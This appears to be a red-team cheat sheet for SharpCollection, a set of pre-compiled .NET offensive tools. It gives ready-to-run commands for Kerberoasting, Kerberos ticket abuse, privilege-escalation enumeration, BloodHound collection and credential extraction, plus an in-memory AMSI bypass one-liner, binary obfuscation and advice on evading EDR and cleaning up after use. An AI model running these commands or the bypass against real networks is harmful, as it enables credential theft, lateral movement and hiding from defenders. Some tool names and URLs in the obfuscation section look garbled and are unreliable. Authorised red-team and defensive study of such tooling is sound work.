SharpCollection
SharpCollection is a curated repository of pre-compiled .NET offensive security tools maintained by Flangvik, providing ready-to-use binaries for post-exploitation and red team operations. Rather than compiling tools on target systems, operators can download pre-built versions that are consistent, tested, and optimized for various .NET Framework versions.
Overview
Abschnitt betitelt „Overview“SharpCollection consolidates tools from GhostPack (by harmj0y and team) and community-developed .NET red team utilities into a single repository with nightly builds. The pre-compiled approach offers significant advantages:
- Speed: No compilation time on target systems
- Consistency: Verified working versions across different environments
- Flexibility: Multiple .NET Framework versions available (4.0, 4.5, 4.7)
- Accessibility: Pre-compiled binaries reduce dependencies and complexity
The repository is hosted on GitHub and includes tools for Kerberos exploitation, Active Directory enumeration, privilege escalation, browser credential extraction, and more.
Download and Setup
Abschnitt betitelt „Download and Setup“Clone the SharpCollection repository to your attack machine:
git clone https://github.com/Flangvik/SharpCollection.git
cd SharpCollection
ls -laThe repository structure is organized by .NET Framework version:
SharpCollection/
├── NetFramework_4.0_Any/
├── NetFramework_4.5_Any/
├── NetFramework_4.7_Any/
└── README.mdEach directory contains pre-compiled binaries for different target .NET versions. Explore available tools:
ls -lh NetFramework_4.7_Any/Included Tools Reference
Abschnitt betitelt „Included Tools Reference“| Tool | Category | Purpose |
|---|---|---|
| Rubeus | Kerberos | Kerberos ticket manipulation, ASREPRoasting, Kerberoasting, ticket renewal |
| Seatbelt | Enumeration | Local enumeration (OS, patches, antivirus, processes, network, services) |
| SharpUp | Privilege Escalation | Windows privilege escalation vector enumeration |
| Certify | Active Directory CS | Active Directory Certificate Services enumeration and exploitation |
| SharpHound | Reconnaissance | BloodHound data collector for Active Directory visualization |
| SharpDPAPI | Data Protection | DPAPI credential dumping and decryption |
| SharpChrome | Credential Extraction | Extract credentials and cookies from Chrome, Edge, Brave |
| SharpView | Active Directory | PowerView-like AD enumeration and recon |
| SharpRDP | Remote Access | RDP session enumeration and reconnaissance |
| SharpWMI | WMI Queries | WMI-based system enumeration and lateral movement |
| SharpGPOAbuse | GPO Abuse | Group Policy manipulation for privilege escalation |
| StandIn | AD Manipulation | Direct LDAP-based Active Directory modifications |
| SharpLAPS | LAPS | LAPS password extraction and enumeration |
| Snaffler | File Enumeration | High-speed file share scanning and classification |
| ADCSPwn | AD CS Exploitation | Automated Active Directory Certificate Services abuse |
| KrbRelay | Kerberos Relay | Kerberos relay attacks for lateral movement |
| SharpSCCM | SCCM Exploitation | SCCM environment enumeration and abuse |
| Whisker | Shadow Credentials | Create Shadow Credentials for AD accounts |
Basic Usage with C2 Frameworks
Abschnitt betitelt „Basic Usage with C2 Frameworks“Cobalt Strike
Abschnitt betitelt „Cobalt Strike“Execute pre-compiled tools via Cobalt Strike’s execute-assembly:
execute-assembly C:\path\to\Seatbelt.exe -group=system
execute-assembly C:\path\to\Rubeus.exe kerberoast /outfile=roasts.txt
execute-assembly C:\path\to\SharpHound.exe -c All
execute-assembly C:\path\to\Certify.exe find /vulnerableUpload tools to target:
cd NetFramework_4.5_Any
upload Seatbelt.exe
upload Rubeus.exe
upload SharpUp.exeCovenant
Abschnitt betitelt „Covenant“Execute via Covenant’s assembly execution:
Assembly /path/to/Seatbelt.exe -group=user
Assembly /path/to/Rubeus.exe tgtdelegUse Sliver’s execute command:
execute C:\Tools\Seatbelt.exe -group=services
execute C:\Tools\SharpUp.exe audit.NET Framework Version Selection
Abschnitt betitelt „.NET Framework Version Selection“Choose the correct binary for your target’s .NET Framework version:
| Version | Path | Compatibility | Notes |
|---|---|---|---|
| 4.0 | NetFramework_4.0_Any/ | Widest | Older Windows (Server 2008 R2, Windows 7) |
| 4.5 | NetFramework_4.5_Any/ | Most Common | Windows 8+, Server 2012+ |
| 4.7 | NetFramework_4.7_Any/ | Modern | Windows 10, Server 2016+ |
Determine target .NET version via PowerShell:
# Check installed .NET Framework versions
reg query 'HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP' /s
# Or use this command:
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' |
Select-Object PSChildName, VersionsUsing dotnet binary:
dotnet --versionWhen in doubt, use NetFramework_4.5_Any as it covers most modern Windows systems.
OPSEC Considerations
Abschnitt betitelt „OPSEC Considerations“Hash-Based Detection
Abschnitt betitelt „Hash-Based Detection“Known SharpCollection binaries are detected by EDR and antivirus solutions. Always assume hashes are catalogued:
- Never use pre-compiled binaries without modification
- Modify source and recompile for your environment
- Use binary obfuscation techniques
Obfuscation Methods
Abschnitt betitelt „Obfuscation Methods“Obfuscate binaries with ConfuserEx:
# Install ConfuserEx (on Windows with .NET)
# Download from: confusex.codeplex.com or use alternatives
# Using InvisibilityCloak (command-line option):
InvisibilityCloak.exe -i Seatbelt.exe -o Seatbelt_obf.exeOr use Semantic Insignificance Framework:
SemanticInformationFramework.exe input.exe output.exeAMSI Evasion
Abschnitt betitelt „AMSI Evasion“Pre-compiled tools may trigger AMSI. Bypass techniques:
# Disable AMSI in-memory (if unpatched):
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').
GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Then execute:
.\Seatbelt.exe -group=userAlternatively, host binaries over HTTP or load via living-off-the-land techniques.
Building from Source
Abschnitt betitelt „Building from Source“If pre-compiled binaries are blocked, build from source:
- Clone GhostPack repositories:
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus- Build with Visual Studio:
Open the .sln file in Visual Studio and build the solution, or use:
# Or use dotnet CLI:
dotnet build -c Release- Output binary location:
Rubeus/bin/Release/Rubeus.exeCompiling on target systems is slower but may evade binary scanning.
Useful Tool Combinations
Abschnitt betitelt „Useful Tool Combinations“Kerberos Attack Chain
Abschnitt betitelt „Kerberos Attack Chain“# 1. Find roastable users
Rubeus.exe kerberoast /format:hashcat
# 2. Extract TGT for delegation
Rubeus.exe tgtdeleg
# 3. Use ticket for lateral movement
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /ticket:[base64]Post-Exploitation Enumeration
Abschnitt betitelt „Post-Exploitation Enumeration“# 1. General system info
Seatbelt.exe -group=system
# 2. Find privilege escalation paths
SharpUp.exe audit
# 3. Check for LAPS passwords
SharpLAPS.exe
# 4. Enumerate AD Certificate Services
Certify.exe find /vulnerableBloodHound Data Collection
Abschnitt betitelt „BloodHound Data Collection“SharpHound.exe -c All
SharpHound.exe -c All --ldapusername domain.com\user --ldappassword password
SharpHound.exe -c All --zipfilename output.zipTroubleshooting
Abschnitt betitelt „Troubleshooting“Binary Won’t Execute
Abschnitt betitelt „Binary Won’t Execute“Issue: Access is denied or binary fails to run
Solutions:
- Verify correct .NET Framework version for target
- Check file permissions
- Bypass execution policy:
powershell -ExecutionPolicy Bypass -File script.ps1 - Execute via
rundll32or other LOLBins if direct execution blocked
Tool-Specific Errors
Abschnitt betitelt „Tool-Specific Errors“Seatbelt fails on enumeration:
# Run with specific group only
Seatbelt.exe -group=systemRubeus requires administrative context:
# Certain Rubeus commands require admin
# Check execution context first
whoami /groupsSharpHound connection issues:
# Specify LDAP server explicitly
SharpHound.exe -d domain.com -s dc1.domain.com -c AllBest Practices
Abschnitt betitelt „Best Practices“- Version Control: Track which binary version you’re using and document results
- Selective Execution: Run only tools needed for your operation (reduces detection surface)
- Output Handling: Redirect output to files and exfiltrate safely
- Timing: Space out tool execution to avoid behavioral detection
- Cleanup: Remove tools from target after use
- Source Builds: For critical operations, build tools from source to avoid known-hash detection
- Testing: Test obfuscated/modified binaries in lab before operational use
- Logging: Monitor target Windows Event Logs for tool execution indicators
Related Tools and Alternatives
Abschnitt betitelt „Related Tools and Alternatives“Source Repositories
Abschnitt betitelt „Source Repositories“- GhostPack: harmj0y’s original tool suite (Rubeus, Seatbelt, SharpUp)
- BloodHound-CE: Community Edition for AD visualization
- PowerView/PowerUp: PowerShell versions of enumeration and exploitation tools
Language Alternatives
Abschnitt betitelt „Language Alternatives“- Beacon Object Files (BOF): Faster execution in memory via Cobalt Strike
- Nim/C2: Rewrite tools in Nim for .NET avoidance
- Go Binaries: Cross-platform alternatives (winrm-go, ldap-go)
Detection Evasion
Abschnitt betitelt „Detection Evasion“- ConfuserEx: Obfuscate .NET binaries
- InvisibilityCloak: String encryption and code obfuscation
- NetLoader: Load assemblies directly into memory
References
Abschnitt betitelt „References“- SharpCollection GitHub: Maintained nightly builds
- GhostPack Suite: Original security research and tools
- Active Directory exploitation techniques
- .NET Framework documentation for version compatibility